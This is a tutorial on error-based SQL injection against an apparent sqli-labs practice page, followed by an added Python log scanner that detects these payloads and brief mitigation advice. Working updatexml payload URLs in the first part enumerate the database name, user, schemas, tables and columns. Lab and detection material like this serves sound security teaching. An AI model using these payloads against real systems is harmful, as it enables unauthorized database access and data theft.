SQL Injection - Error-Based Injection
Error-Based Injection
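Request the following URL:
http://192.168.17.137/sql/Less-1/?id=1'
The request triggers an error and the error message is printed to the page, so error-based injection can be used.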
Run the following to get the current database name:
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
Get user()
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
Query the database names
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+
Get the table names
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)--+
Get the column names
http://192.168.17.137/sql/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e),1)--+
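
Seen from the defending side, the requests above share a small set of traits that can be matched in web access logs. The following is an added example, not part of the original page: it decodes each query parameter and reports which traits it contains. The log lines, rule names and function names are constructed for illustration, and `extractvalue` is included as an assumption beyond the `updatexml` calls shown on the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the original page); the last two
# carry URL-encoded forms of the payloads shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sql/Less-1/?id=1 HTTP/1.1" 200 721',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sql/Less-1/?id=1%27 HTTP/1.1" 200 803',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /sql/Less-1/?id=1%27%20and%20'
    'updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ HTTP/1.1" 200 790',
    '10.0.0.5 - - [01/Jan/2024:10:00:14 +0000] "GET /sql/Less-1/?id=1%27%20and%20'
    'UpdateXML(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables'
    '%20where%20table_schema=%27security%27%20limit%203,1),0x7e),1)--+ HTTP/1.1" 200 795',
]

# Hypothetical rule names; each regex targets one trait of the payloads above.
RULES = [
    ("xml_error_function", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("tilde_marker_concat", re.compile(r"concat\s*\(\s*0x7e", re.I)),  # 0x7e is '~'
    ("metadata_enumeration", re.compile(r"information_schema\.(schemata|tables|columns)", re.I)),
    ("context_function", re.compile(r"\b(database|user|version)\s*\(\s*\)", re.I)),
    ("quote_then_comment", re.compile(r"'.*(--\s|#)", re.S)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return {parameter: [matched rule names]} for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return {}
    hits = {}
    # parse_qsl percent-decodes values and turns '+' into a space, so '--+' becomes '-- '.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        matched = [rule for rule, rx in RULES if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits

def scan_log(lines):
    """Return [(line_index, findings)] for every line with at least one hit."""
    results = []
    for i, line in enumerate(lines):
        findings = scan_line(line)
        if findings:
            results.append((i, findings))
    return results

if __name__ == "__main__":
    for i, findings in scan_log(SAMPLE_LOG):
        print(i, findings)
```

The lone quote probe in the second sample line is not flagged by these rules. Log matching is a detection aid only; the requests above succeed because the page prints database errors in its response, so returning a generic error page and using parameterized queries removes the channel itself.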